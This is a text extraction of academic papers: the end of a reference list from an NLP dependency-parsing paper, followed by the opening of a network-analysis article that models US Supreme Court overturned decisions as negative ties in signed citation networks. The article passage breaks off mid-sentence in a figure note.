Fredrik Jørgensen, Hüner Kaşıkara, Sylvain Kahane, Hiroshi Kanayama, Jenna Kanerva, Tolga Kayadelen, Václava Kettnerová, Jesse Kirchner, Natalia Kotsyba, Simon Krek, Sookyoung Kwak, Veronika Laippala, Lorenzo Lambertino, Tatiana Lando, Septina Dian Larasati, Alexei Lavrentiev, John Lee, Phu%o%ng LêHò̂ng, Alessandro Lenci, Saran Lertpradit, Herman Leung, Cheuk Ying Li, Josie Li, Keying Li, Kyungtae Lim, Nikola Ljubešić, Olga Loginova, Olga Lyashevskaya, Teresa Lynn, Vivien Macketanz, Aibek Makazhanov, Michael Mandl, Christopher Manning, Ruli Manurung, Cătălina Mărănduc, David Mareček, Katrin Marheinecke, Hector Martinez Alonso, André Martins, Jan Mašek, Yuji Matsumoto, Ryan Mcdonald, Gustavo Mendonça, Niko Miekka, Anna Missilä, Cătălin Mititelu, Yusuke Miyao, Simonetta Montemagni, Amir More, Laura 710 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 Moreno Romero, Shinsuke Mori, Bjartur Mortensen, Bohdan Moskalevskyi, Kadri Muischnek, Yugo Murawaki, Kaili Müürisep, Pinkey Nainwani, Juan Ignacio Navarro Horñiacek, Anna Nedoluzhko, Gunta Nešpore- Bērzkalne, Lu%o%ng Nguyẽ̂n Thi, Huyè̂n Nguyẽ̂n Thi Minh, Vitaly Nikolaev, Rattima Nitisaroj, Hanna Nurmi, Stina Ojala, Adédayò. Olúòkun, Mai Omura, Petya Osenova, Robert Östling, Lilja Øvrelid, Niko Partanen, Elena Pascual, Marco Passarotti, Agnieszka Patejuk, Siyao Peng, Cenel-Augusto Perez, Guy Perrier, Slav Petrov, Jussi Piitulainen, Emily Pitler, Barbara Plank,Thierry Poibeau, Martin Popel, Lauma Pretkalniņa, Sophie Prévost, Prokopis Prokopidis, Adam Przepiórkowski, Tiina Puolakainen, Sampo Pyysalo, Andriela Rääbis, Alexandre Rademaker, Loganathan Ramasamy, Taraka Rama, Carlos Ramisch, Vinit Ravishankar, Livy Real, Siva Reddy, Georg Rehm, Michael Rießler, Larissa Rinaldi, Laura Rituma, Luisa Rocha, Mykhailo Romanenko, Rudolf Rosa, Davide Rovati, Valentin Roşca, Olga Rudina, Shoval Sadde, Shadi Saleh, Tanja Samardžić, Stephanie Samson, Manuela Sanguinetti, Baiba Saulı̄te, Yanin Sawanakunanon, Nathan Schneider, Sebastian Schuster, Djamé Seddah, Wolfgang Seeker, Mojgan Seraji, Mo Shen, Atsuko Shimada, Muh Shohibussirri, Dmitry Sichinava, Natalia Silveira, Maria Simi, Radu Simionescu, Katalin Simkó, Mária Šimková, Kiril Simov, Aaron Smith, Isabela Soares- Bastos, Antonio Stella, Milan Straka, Jana Strnadová, Alane Suhr, Umut Sulubacak, Zsolt Szántó, Dima Taji, Yuta Takahashi, Takaaki Tanaka, Isabelle Tellier, Trond Trosterud, Anna Trukhina, Reut Tsarfaty, Francis Tyers Sumire Uematsu, Zdeňka Urešová, Larraitz Uria, Hans Uszkoreit, Sowmya Vajjala, Daniel Niekerk, Gertjan Noord, Viktor Varga, Veronika Vincze, Lars Wallin, Jonathan North Washington, Seyi Williams, Mats Wirén, Tsegay Woldemariam, Tak-Sum Wong, Chunxiao Yan, Marat M. Yavrumyan, Zhuoran Yu, Zdeněk Žabokrtský, Amir Zeldes, Daniel Zeman, Manying Zhang, and Hanzhi Zhu. 2018. Universal dependencies 2.2. Joakim Nivre, Marie-Catherine De Marneffe, Filip Ginter, Yoav Goldberg, Jan Hajic, Christopher D. Manning, Ryan McDonald, Slav Petrov, Sampo Pyysalo, Natalia Silveira, Reut Tsarfaty, and Daniel Zeman. 2016. Universal dependencies v1: A multilingual treebank collection. In LREC. Jeffrey Pennington, Richard Socher, and Christopher D. Manning. 2014. GloVe: Global vectors for word representation. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 1532–1543. Matthew Peters, Mark Neumann, Mohit Iyyer, Matt Gardner, Christopher Clark, Kenton Lee, and Luke Zettlemoyer. 2018. Deep contextualized word representations. In Proceedings of the 2018 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long Papers), pages 2227–2237, New Orleans, LA. Barbara Plank and Željko Agić. 2018. Distant supervision from disparate sources for low- resource part-of-speech tagging. In Proceedings of the 2018 Conference on Empirical Methods in Natural Language Processing, pages 614–620, Brussels. Barbara Plank and Gertjan Van Noord. 2011. Effective measures of domain similarity for parsing. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Human Language Technologies- Volume 1, pages 1566–1576. Roi Reichart and Ari Rappoport. 2007. Self- training for enhancement and domain adaptation of statistical parsers trained on small datasets. In Proceedings of the 45th Annual Meeting of the Association of Computational Linguistics, pages 616–623. Sebastian Ruder and Barbara Plank. 2018. Strong baselines for neural semi-supervised learning under domain shift. In The 56th Annual Meeting of the Association for Computational LinguisticsMeeting of the Association for Computational Linguistics. Alexander M. Rush, Roi Reichart, Michael Collins, and Amir Globerson. 2012. Improved parsing and POS tagging using inter-sentence consistency constraints. In Proceedings of the 2012 Joint Conference on Empirical 711 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 Methods in Natural Language Processing and Computational Natural Language Learning, pages 1434–1444. Piotr Rybak and Alina Wróblewska. 2018. Semi- supervised neural system for tagging, parsing and lematization. In Proceedings of the CoNLL 2018 Shared Task: Multilingual Parsing from Raw Text to Universal Dependencies, pages 45–54. Motoki Sato, Hitoshi Manabe, Hiroshi Noji, and Yuji Matsumoto. 2017. Adversarial training for cross-domain universal dependency parsing. In Proceedings of the CoNLL 2017 Shared Task: Multilingual Parsing from Raw Text to Universal Dependencies, pages 71–79. Ehsan Shareghi, Yingzhen Li, Yi Zhu, Roi Reichart, and Anna Korhonen. 2019. Bayesian learning for neural dependency parsing. In Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long and Short Papers), pages 3509–3519. Anders Søgaard. 2010. Simple semi-supervised training of part-of-speech taggers. In Proceedings of the ACL 2010 Conference Short Papers, pages 205–208. Drahomı́ra Spoustová and Miroslav Spousta. 2010. Dependency parsing as a sequence labeling task. Prague Bulletin of Mathematical Linguistics, 94:7–14. Nitish Srivastava, Geoffrey Hinton, Alex Krizhevsky, Ilya Sutskever, and Ruslan Salakhutdinov. 2014. Dropout: A simple way to prevent neural networks from overfitting. Journal of Machine Learning Research, 15(1):1929–1958. Mark Steedman, Miles Osborne, Anoop Sarkar, Stephen Clark, Rebecca Hwa, Julia Hockenmaier, Paul Ruhlen, Steven Baker, and Jeremiah Crim. 2003. Bootstrapping statistical parsers from small datasets. In Proceedings of the Tenth Conference on European Chapter of the Association for Computational Linguistics- Volume 1, pages 331–338. Michalina Strzyz, David Vilares, and Carlos Gómez-Rodrıguez. 2019. Viable dependency parsing as sequence labeling. In Proceedings of NAACL-HLT , pages 717–723. Ian Tenney, Patrick Xia, Berlin Chen, Alex Wang, Adam Poliak, R. Thomas McCoy, Najoung Kim, Benjamin Van Durme, Samuel R. Bowman, Dipanjan Das, and Ellie Pavlick. 2019. What do you learn from context? Probing for sentence structure in contextualized word representations. In Proceedings of ICLR. Kristina Toutanova, Xi Victoria Lin, Wen- tau Yih, Hoifung Poon, and Chris Quirk. 2016. Compositional learning of embeddings for relation paths in knowledge base and text. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), volume 1, pages 1434–1444. Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Ĺukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in Neural Information Processing Systems, pages 5998–6008. Oriol Vinyals, Ĺukasz Kaiser, Terry Koo, Slav Petrov, Ilya Sutskever, and Geoffrey Hinton. 2015. Grammar as a foreign language. In Advances in Neural Information Processing Systems, pages 2773–2781. Alex Wang, Jan Hula, Patrick Xia, Raghavendra Pappagari, R. Thomas McCoy, Roma Patel, Najoung Kim, Ian Tenney, Yinghui Huang, Katherin Yu, Shuning Jin, Berlin Chen, Benjamin Van Durme, Edouard Grave, Ellie Pavlick, and Samuel R. Bowman. 2019. Can you tell me how to get past sesame street? Sentence-level pretraining beyond language modeling. In Proceedings of the 57th Conference of the Association for Computational Linguistics, pages 4465–4476. John Wieting and Douwe Kiela. 2019. No train- ing required: Exploring random encoders for sentence classification. In Proceedings of ICLR. Vikas Yadav and Steven Bethard. 2018. A survey on recent advances in named entity recognition from deep learning models. In Proceedings of the 27th International Conference on Computational Linguistics, pages 2145–2158. 712 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 David Yarowsky. 1995. Unsupervised word sense disambiguation rivaling supervised methods. In 33rd Annual Meeting of the Association for Computational Linguistics. Kelly W. Zhang and Samuel R. Bowman. 2018. Language modeling teaches you more than translation does: Lessons learned through auxiliary syntactic task analysis. In Proceedings of the 2018 EMNLP Workshop BlackboxNLP: Analyzing and Interpreting Neural Networks for NLP, pages 359–361, Brussels. Xiang Zhang, Junbo Zhao, and Yann LeCun. 2015. Character-level convolutional networks for text classification. In Advances in Neural Infor- mation Processing Systems, pages 649–657. Zhi-Hua Zhou and Ming Li. 2005. Tri-training: Exploiting unlabeled data using three classi- fiers. IEEE Transactions on Knowledge & Data Engineering, (11):1529–1541. Yftah Ziser and Roi Reichart. 2018. Pivot based language modeling for improved neural domain adaptation. In Proceedings of the 2018 Conference of the North American Chapter of the Association for Computational Lin- guistics: Human Language Technologies, Volume 1 (Long Papers), pages 1241–1251, New Orleans, LA. 713 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 Introduction Previous Work Background: The biaffine Parser Deep Contextualized Self-training Representation Learning (Steps 3 and 4) The Final Hybrid Parser (Step 5) Evaluation Setups Experiments Results Ablation Analysis and Discussion Conclusions work_q656kozazbablahfqw63b62apa ---- CONNECTIONS 1© 2019 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/). Issue 1 | Vol. 39Article | DOI: 10.21307/connections-2019-002 Signed Networks for the US Supreme Court Overturning its Prior Decisions The Supreme Court is placed at the top of the US judicial system. This Court can hear all civil cases between states and cases between a state and all federal institutions. Also, it can review all decisions made by lower courts. As such, it is one of the three fundamental branches of the US government. Its de- cisions can have far reaching effects on all areas of life in the USA. There is a large legal literature on the workings of the Supreme Court. In this context, Fowler and Jeon (2008) created a network file with all Supreme Court decisions for the pe- riod 1789–2001 and their citations to earlier decisions made by this Court. The number of decisions in this network is 30,288. Producing these data was an in- valuable service for scholars studying this court and for network analysts. It facilitated the study of the US Supreme Court in terms of network analytic ideas. The network ties are citations from later decisions to earlier decisions taken from the majority opinions 1. There are multiple ways of studying this citation network. Fowler and Jeon used it to study the evolution of stare decesis, Latin for “to stand by things decided.” They showed a steady evolution of this fundamental legal concept through the nineteenth and the early twenti- eth Centuries. They documented a departure from this pattern by the Warren Court (1953–1969). By using the concept of authorities (Kleinberg, 1998), they con- structed measures of the importance of decisions and tracked changes in their importance over time. Even Patrick Doreian1,2 and Andrej Mrvar2 1Department of Sociology, University of Pittsburgh, Pittsburgh, USA. 2Faculty of Social Sciences, University of Ljubljana, Ljubljana, Slovenia. E-mails: pitpat@pitt.edu; andrej. mrvar@fdv.uni-lj.si. This paper was edited by Eric Quintane. Received for publication April 2, 2019. Abstract This paper introduces the idea of studying the decision citation network of the US Supreme Court in a new fashion by focusing on this Court’s overturning of some of its prior decisions. Two depar- tures from current practices were developed. One was to consider the phenomenon of overturning in a broader network context. The second was to treat the citations between overturning decisions and the overturned decisions as negative ties. This led to the creation of multiple signed citation networks. These networks were studied to get a better understanding of the operation of this Court. The results show that, frequently, when decisions are overturned, this is not done in a logically consistent fashion. A research agenda is proposed regarding a reexamination of stare decesis, thought to be a bedrock of the US legal system, and calling it into question as a genuine operating legal principle. Keywords Supreme Court, Overturning decisions, Signed networks, Citation network. 1Very frequently, multiple opinions are written for each decision. One is the majority opinion which is written by one justice that other justices join. There can be concurring opinions which agree with the decision but use different ar- guments or rationales for supporting the decision that was made. There can be dissenting opinions written by justices who reject the decision. Fowler and Jeon (2008) used only the majority opinions in constructing the citation network as they are the dominant opinions for the decisions. As a result, the decision and the majority opinion are treated as being the same. Signed networks for the Supreme Court citation network 2 though they were attentive to some decisions over- turning earlier decisions, Fowler and Jeon treated the ties between overturning decisions and the decisions they overturned as positive citation ties. A different approach to studying this network was presented in Batagelj et al. (2014, Chapter 6). Rather than use counts of citations to (or from) de- cisions, they opted for examining the extent to which earlier decisions were co-cited. The rationale for this approach was the intuition that earlier decisions being heavily co-cited together must have important fea- tures in common. Using the islands technique (Bat- agelj et al., 2014, Chapter 2), they identified sets of decisions that were linked internally by much higher rates of being co-cited than for other decisions within the network. One concerned only Native Americans. Many of the Supreme Court’s decisions led to heavy constraints on these peoples, especially restrictions of their legal autonomy. The “important feature” for the decisions in this island was the consideration of Native Americans. Another island identified diverse groups of people and ideas targeted in the US court system following three Acts2 passed by Congress in WWI. The con- stitutional principles involved the First and Fourteenth Amendments as the important features holding this set of decisions together. The targeted groups were in sequence: socialists and communists (in the First Red Scare in the 1920s); labor unions; black organi- zations, especially the NAACP; Jehovah’s Witnesses; communists and socialists again (in the Second Red Scare from the late 1940s through the 1950s); Je- hovah’s Witnesses again; women (regarding limiting their access to birth control and, later, abortion); ob- scenity; the free press; and restrictions of the free- dom of speech. Both of these studies provided useful insights re- garding the decisions of the Supreme Court and the impacts these decisions had on the USA, its institu- tions and its population. The key new idea introduced here is to treat the Supreme Court citation network as being signed when overturning of prior decisions occurs. The rest of the paper is organized as follows. Sec- tion “Treating the Supreme Court Citation Network as Signed” provides the rationale of defining negative ties in the Supreme Court citation network and treating it being signed. Section “Consistencies and Inconsistencies in Triples of Decisions” introduces the idea of there being inconsistencies in signed triples of decisions when overturning is involved. Section “The Supreme Court Overturning Network Data” provides the definition of multiple signed networks that result along with the rationale for studying them in detail. We focus on the decisions linked by negative ties in Section “Networks of Decisions Linked Only by Neg- ative Citation Ties.” The mobilization of inconsistency ideas follows in Section “Mobilizing Ideas Regarding Inconsistencies When Decisions Are Overturned” and forms the core of the paper3. Section “Empirical Ex- amples of the Inconsistent Triple Types” provides fur- ther examples of inconsistent triples. Our conclusions and a proposed research agenda are presented in Section “Conclusions, a Research Agenda and a Speculation about Stare Decesis.” Treating the Supreme Court citation network as signed Here, we introduce a different approach to these data by focusing on this citation network as one that is signed. As noted by Fowler and Jeon (2008), a large majority of Supreme Court decisions cite earlier deci- sions 4. Within their research framework, all citations were positive ties. However, there is no sensible basis for treating any overturning “citation” tie as a positive citation to the overturned decision. When an earlier decision is overturned, the overturning decision re- pudiates all or part of the overturned decision. The ties between them must be considered as negative. This implies the construction of one or more signed citation networks for studying Supreme Court deci- sions. By a wide margin, most (87%) earlier decisions were overturned completely. The designation of a de- cision as being overturned “in part” was made by the Government Printing Office (2014). Decisions, most often, have multiple components and rationales for the decisions that were made. If only some of them are negated by a subsequent decision, this was listed as a decision that was overturned in part. To our knowledge, such an approach has not been adopted hitherto when examining the Supreme Court citation network. This creates an opportunity 2Two were the Selective Service Act and Espionage Act that were passed in 1917. The Sedition Act was passed in 1918 to extend the Espionage Act to broaden the number of offenses meriting punishments for interfering with the operation of the US government. 3Most of the analyses performed for our results used Pajek (Batagelj and Mrvar, 1998). 4There are decisions that cite no earlier decisions and are not cited by later decisions. As such, they are isolates in the citation network and were not considered further. CONNECTIONS 3 for considering some additional questions about the operation of this court. The resulting signed networks are described in more detail in Section “The Supreme Court Overturning Network Data.” These questions include: (a) What is the nature and structure of this signed network? (b) How much overturning of prior decisions exists? (c) Why do prior decisions get overturned? and (d) What can be gained by looking at networks of Supreme Court decisions linked by negative ties? As noted above, Fowler and Jeon (2006) consid- ered stare decesis to document its existence and importance. We look at this idea in a different way by viewing it with greater skepticism even though it is thought to be one of the bedrocks of the US judicial system. This is done using the negative ties due to some decisions overturning prior decisions which are instances of stare decesis being explicitly rejected. Our hope is that this line of analysis will add to the work of Spaeth and Segal (1999) who, using a clever research design, provided convincing evidence that Justices are far more like to vote their preferences than they are to follow stare decesis. Most discussions of the Supreme Court overturn- ing prior decisions focus primarily on single pairs of de- cisions. In considering such (overturning, overturned) pairs of decisions, the main features considered in these analyses include the substantive issues in- volved, the constitutional principles used to decide cases, and the written opinions of Justices regarding prior relevant decisions. Of course, these issues must be considered always in such analyses. But, while this is very useful for studying pairs of decisions, such a strategy has limitations by being a dyadic approach. As we show below, such (overturning, overturned) pairs of decisions are embedded in larger network structures, especially triples of decisions, in ways that show logical inconsistencies. It seems more fruitful to think in terms of networks of decisions involving cases when prior decisions are overturned. Consistencies and inconsistencies in triples of decisions Here, we focus primarily on the presence of incon- sistencies in triples of decisions when there are neg- ative ties between some pairs of decisions. This is illustrated in Figure 1 with three triples of hypothetical Supreme Court decisions where consistency appears to be lacking. In the left-side triple, Decision 1 cites Decisions 2 and 3 positively even though Decision 2 overturns Decision 3. In the middle triple, Decision 1 cites Decision 2 positively while Decision 2 cites Deci- sion 3 positively. Yet Decision 1 overturns Decision 3. In the rightmost triple, Decision 1 overturns Decision 2 and cites positively Decision 3. But Decision 2 also cites Decision 3 positively. All these triples are incon- sistent. We provide real empirical examples of each of these inconsistent triple types in Section “Mobiliz- ing Ideas Regarding Inconsistencies When Decisions Are Overturned.” Ideally, none of these inconsistent triples would exist in a signed Supreme Court citation network if the arguments and ideas expressed in these decisions were thought through in a thoroughly systematic fashion. But, as we show below, such inconsistencies do exist, raising two obvious further questions. First, how many such triples are there? Second, does this matter? The answers are that many do exist and, yes, they do matter. However, there is a complication that arises here. Consider the rightmost triple in Figure 1. If Decision 1 overturns a part of Decision 2 that is irrelevant for Decision 3, that Decision 1 cites Decision 3 and that Figure 1: Three inconsistent triples of hypothetical decisions each involving one overturning link. Signed networks for the Supreme Court citation network 4 Decision 2 does not overturn Decision 3, then there is no inconsistency. This implies a need to distin- guish between completely overturned decisions and decisions that are overturned in part. We tackle this in two ways. One is to ignore the distinction and treat- ing all overturning pairs. This has a clear problem in that the number of instances of inconsistencies will be overstated. The second is to confine attention solely to those decisions that are overturned com- pletely. This also has a limitation in that the number of instances of inconsistencies will be understated. Continuing the example, if Decision 1 overturns a part of Decision 2 that is relevant for Decision 3, then there is an inconsistency. An inherent task for a com- plete analysis is the necessity to look at all (overturn- ing, overturned) pairs of decision to determine what exactly was overturned when a decision is overturned in part. This will be a daunting task but is not needed here given the results shown below. The Supreme Court overturning network data The primary data source for the signed network we consider herein is the Government Printing Office (2014) document: Supreme Court Decisions Over- ruled by Subsequent Decision. These data were sup- plemented by information obtained from multiple other sources including: Epstein et al. (2015), Root (2014), Vile (2010), Powe (2009), Gerhardt (2008), Hall (2005), Spriggs and Hansford (2001), Brenner and Spaeth (1995) and Eskridge (1988) 5. This entailed identify- ing the overturned decisions in the larger network of Fowler and Jeon and marking the overturning links as negative citation ties. Multiple signed networks were constructed. For the period we consider (1789–2005)6, there were 606 decisions involved in the resulting networks with later decisions overturning prior decisions. There were 379 instances of such (overturning, overturned) pairs of decisions. Below, we show that some decisions overturned more than one decision. Such a phenom- enon would be missed in a strict dyadic approach to overturning decisions. This has relevance as overturn- ing one decision can imply that other related earlier decisions may also suffer the same fate. Examples of this happening are provided in Section “Networks of Decisions Linked Only by Negative Citation Ties”. Some decisions were overturned multiple times. It would seem that if a prior decision is overturned completely, this ought to be sufficient to invalidate the overturned decision as precedent. Seemingly, this is not the case. When a decision is overturned, there are rationales provided for doing so. However, there can be different rationales for overturning an earlier decision. In the view of later Courts overturning prior decisions, it appears that they think they have a more compelling rationale for overturning an earlier decision. Such instances strongly reinforce our view that con- sidering networks of decisions instead of separate dyads is useful. Multiple signed networks can be constructed. One is the network of decisions linked by only the negative ties. This is illustrated in Figure 2 and dis- cussed further in Section “Networks of Decisions Linked Only by Negative Citation Ties.” There is also the adaptation of the Fowler and Jeon (2008) network where the overturning links defined as negative rather than positive were changed. For our major analyses, we labeled this as a “starting” network. We used this network to create another signed network by embed- ded it into the network of all relevant decisions and the positive ties linking them in the Fowler and Jeon network. The relevance for this inclusion was that the additional decisions had to meet two critical criteria. One was to include all earlier decisions that were cited (positively) by the decisions in the starting network. The second was to include all of the later decisions citing all of the decisions in the so-called starting net- work. The resulting network had 9,297 decisions. It had 116,899 positive ties and 328 negative ties. We first show the bigger picture regarding over- turning of prior decisions in Figure 2. This is the first signed network as all the network ties in this figure are negative. It is ordered by time with the most recent Courts being at the top of the figure and the earlier Courts at the bottom 7. It shows two features regarding The Supreme Court. One is the levels of 5Additional information, along with confirmations for deter- mining pairs of overturning and overturned decisions came from a variety of on-line sources. Particularly useful ones were: https://supreme.justia.com/cases/federal/us; https:// law.resource.org/pub/us/case/reporter/US; http://caselaw. findlaw.com/us-supreme-court, https://www.law.cornell. edu/ (Legal Information Institute); https://www.lexisnexis. com/en-us (Lexis Nexis); and https://en.wikipedia.org/wiki/. 6To consider a larger number of instances of this court overturning prior decisions, we expanded the time range to 2005, the end of the Rehnquist Court. 7A future project will include the Roberts Court that followed the Rehnquist Court. CONNECTIONS 5 overturning between Supreme Courts, defined by their Chief Justices, where the arrows show the mag- nitudes of each Court overturning decisions of earlier courts. The widths of these overturning links are far larger in recent years. The other feature is reflected in the sizes of the vertices showing the levels at which specific courts, as defined by their Chief Justices, overturn themselves. Figure 2 raises the issue of why the rates of over- turning prior decisions have increased over time. In large part, we think this may be due simply to the increasing number of prior decisions that could be considered as relevant and wrongly decided by earlier courts. However, we suspect that there may be an additional source for these increased levels of overturning prior decisions. When writing decisions, Justices are free to cite any prior decisions made by earlier courts. More consequentially, perhaps, they are free to not cite earlier decisions which, while rel- evant, would not support the decision being made 8. There are few constraints regarding citation behavior beyond creating the need of crafting arguments and generating support for decisions being made. Also, specific Courts may have increased rates for overturning prior decisions if their broad ideological stances differed. The Warren Court is generally thought to have been “liberal.” Indeed, Fowler and Jeon (2008) note that the Warren Court often overruled precedent. Irons (2002) makes a compelling case that, over its long-term history, the Supreme Court was filled by insiders making decisions with negative impacts on outsiders, primarily minorities, women and the poor. Put differently, Irons emphasized the Figure 2: Levels of overturning decisions within and between courts defined by Chief Justices. 8One compelling example of this phenomenon came with the Dred Scott decision (Scott v. Sandford) written by Chief Justice Taney in 1857. According to Irons (2006, 176), “He misread history, twisted legal precedent, and bent the Constitution out of shape, all to achieve his predetermined goal of promoting the extension of slavery into the territo- ries” (The territories were not part of states at that time). As a part of doing this, he ignored at least 22 prior decisions made by his own court. These omissions were pointed out by the two dissenting Justices, McClean and Curtis, in their strong opinions. Pun intended, there are precedents for ignoring precedent. Signed networks for the Supreme Court citation network 6 Warren Court’s expansive view of rights for all Amer- icans. In contrast, the Rehnquist, Burger, and Vinson Courts have been regarded as “conservative” and more supportive of traditional values. Yet, Figure 2 makes it clear that these conservative Courts also overturned prior decisions at about the same rate as the Warren Court. With different judicial philosophies, there are in- centives for targeting earlier decisions that differ in this regard. It will be a monumental task to pursue this as Supreme Court decisions will have to be read closely, along with concurrences and dissents. That is reserved for another project. Networks of decisions linked only by negative citation ties Here, we consider the network having only the nega- tive overturning links between decisions regardless of the courts making them. It merits attention by having a set of weak components. Their distribution in terms of size is: one having 10 decisions; six with 6 deci- sions; ten having 5 decisions; 15 with 4 decisions; 42 with 3 decisions; and 164 dyadic pairs. While all these components can be considered, we focused on some of the largest weak components. The primary concern for doing this was to understand the sub- stantive issues involved in these cases, the constitu- tional issues used to decide a case, and the Courts involved in these decisions. This is fully consistent with a general research strategy that considers the contexts within which networks are established. The largest such weak component having ten decisions is shown in Figure 3. The two overturning decisions both came from the Warren Court (1953–1969). The overturned de- cisions were made by the Fuller (1888–1910), White (1910–1921), Taft (1921–1930), Hughes (1930–1941), Stone (1941–1946), and Warren Courts. The primary substantive concern was the immunity provision (against self-incrimination)9 in conjunction with the ways the police obtained evidence. Another substan- tive issue was the relative roles of the federal and state courts regarding the nature of evidence, a long-term thorny and contentious legal issue. The Constitutional issues involved were the Fourth Amendment (regard- ing search and seizure) 10, the Fifth Amendment (re- garding self-incrimination and due process) 11, and the Fourteenth Amendment (protecting rights against state infringements and prohibiting states from inter- fering with privileges and immunities) 12. The Warren Court, after 1960, took seriously the protections afforded to people, especially regard- ing due process (Irons, 2006). This contrasted with 9The Fifth Amendment allows defendants not to provide testimony that would be incriminating. Figure 3: The ten-vertex weak component of decisions linked by negative ties. Note: The decisions are labeled by the years they were made, and the notation used by the Supreme Court to identify specific decisions. 10The Fourth Amendment states: “The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized.” 11The Fifth Amendment, in full, states: “No person shall be held to answer for a capital, or otherwise infamous crime, unless on a presentment or indictment of a Grand Jury, except in cases arising in the land or naval forces, or in the Militia, when in actual service in time of War or public danger; nor shall any person be subject for the same of- fense to be twice put in jeopardy of life or limb; nor shall be compelled in any criminal case to be a witness against himself, nor be deprived of life, liberty, or property, without due process of law; nor shall private property be taken for public use, without just compensation.” CONNECTIONS 7 earlier courts that were willing to give the police free rein in gathering evidence even though their practices for doing so frequently violated these amendments 13. This expansive view regarding rights was especially the case after Justice Frankfurter, a conservative jus- tice, left the Warren Court. The overturned decision, 357US371, was authored by Frankfurter. Another overturned decision, 360US230, was a per curiam (unsigned) decision – but there were dissenting justic- es. Justice Frankfurter was not among the dissenters and, by inference, it is fair to claim he supported this decision. The overturning decision, 378US52, was authored by his replacement of the court, Justice Goldberg. It is reasonable to conjecture that, when courts overturn themselves, the most likely reason is the change of its personnel. This is a hypothesis worthy of future exploration. The other decisions overturned by 364US206 all concerned earlier decisions accepting the use of police procedures violating the US constitution. The decision in 378US52, a landmark case accord- ing to multiple sources, was emphatic about rights against self-incrimination guaranteed under the Fifth Amendment. Earlier Courts were willing to declare that if defendants “took the Fifth” it was, in effect, an admission of guilt – with convictions following frequently. Figure 4 contains a six-vertex weak component with three landmark decisions. The earliest of them is 163US537, Plessy v. Ferguson. Decided in 1896 by the Fuller Court, it established the “separate but equal” doctrine regarding race as being constitutional. While the separation (segregation) of races was real, the equal part was far from the reality for the experi- ence of African American citizens being denied ac- cess to public spaces. This decision was overturned by two decisions made by the Warren Court. One was 347US483, Brown v. The Board of Education of Tope- ka, Kansas, which ruled that state laws permitting the establishment of separate schools for black and white students violated the Equal Protection Clause of the Fourteenth Amendment. Two years later, 352US903, Gayle v. Browder, did the same regarding racial seg- regation in buses in Montgomery, Alabama. Other re- lated decisions were overturned also, something that would be missed under the dyadic approach to con- sidering the overturning of Supreme Court decisions. This figure shows emphatically the importance of ex- amining decisions in a broader context than simple pairwise examination of decisions while ignoring the broader context in which these decisions were made. The substantive issues for these decisions were: (a) civil rights and segregation under the “separate but equal” doctrine; and (b) targeting minorities, especially blacks (but also Chinese people at the time of the earliest overturned decision). The constitutional issues were twofold. One was, as noted above, the Fourteenth Amendment (regarding equal protec- tion). The second was the ability of federal courts Figure 4: A six-vertex weak component. Note: The decisions are labeled by the years they were made, and the notation used by the Supreme Court to identify specific decisions. 12The Fourteenth Amendment (Section 1) states: “All per- sons born or naturalized in the United States, and subject to the jurisdiction thereof, are citizens of the United States and of the State wherein they reside. No State shall make or enforce any law which shall abridge the privileges or immunities of citizens of the United States; nor shall any State deprive any person of life, liberty, or property, without due process of law; nor deny to any person within its juris- diction the equal protection of the laws.” 13This is a part of what Fowler and Jeon (2006) noted regarding the Warren Court – but with a very different interpretation. Signed networks for the Supreme Court citation network 8 to intervene at the state level, something frequently opposed under the rubric of “State’s Rights.” This is another example of the Warren Court overturning precedents. Both of these overturning decisions were hailed as a part of major victory for the Civil Rights Movement. Of course, they were. But these decisions also set off a fire storm of reactions both in the legal arena and, perhaps more consequentially, with illegal (and fre- quently very violent) actions including many lynchings of black people, when white people, especially – but not exclusively – in the South, took exception to these rulings and targeted African Americans. This example makes clear also the necessity for considering the social and legislative contexts within which Supreme Courts make their decisions, a point made in Batagelj et al. (2014, Chapter 6). Figure 5 shows a five-vertex weak component with a two-step path of overturning decisions 14. The left-most decision was made by the Warren Court. The remaining decisions were made by the Vinson Court. The substantive issue was the admissibility of evidence collected without a warrant. There were two critical constitutional issues. One is the Fourth Amendment (regarding search and seizure) and the Fourteenth Amendment (due process). It appears that there was some confusion in the Vinson Court on these issues when it overturned itself. But, on closer inspection, when this Court did this, it appears it was due to changes in its composition of Justices, a topic worthy of further consideration. Studying these three weak components of over- turning and overturned decisions made by this Court shows the interplay between the substantive issues considered for specific decisions, the constitutional principles involved, the positions of Justices regarding both, and the contexts within which overturning de- cisions are made. Considering the phenomenon of overturning by the Supreme Court as a network, rather than focusing solely on dyadic ties, is merited. We now tackle a different topic in which the negative overturning links between Supreme Court de- cisions are placed in a more general network context. For this, we reconsider the notion of inconsistency that may exist when Courts overrule their prior decisions. Mobilizing ideas regarding inconsistencies when decisions are overturned Figure 1 displays three potentially inconsistent triples. The set of all possible decision triples are shown in Figure 6. What are the counts of all these triples in the signed Supreme Court network? The triples in the top row are logically consistent while the triples in the bottom row are inconsistent. However, the one on the right of the lower panel is ambiguous. It suggests complete incoherence. For- tunately, as shown below, such triples do not exist in our data. Table 1 shows the distribution of the eight types of potential triples shown in Figure 6. The method for doing this is described in Doreian and Mrvar (2016). Figure 5: A five-vertex weak component. Note: The decisions are labeled by the years they were made, and the notation used by the Supreme Court to identify specific 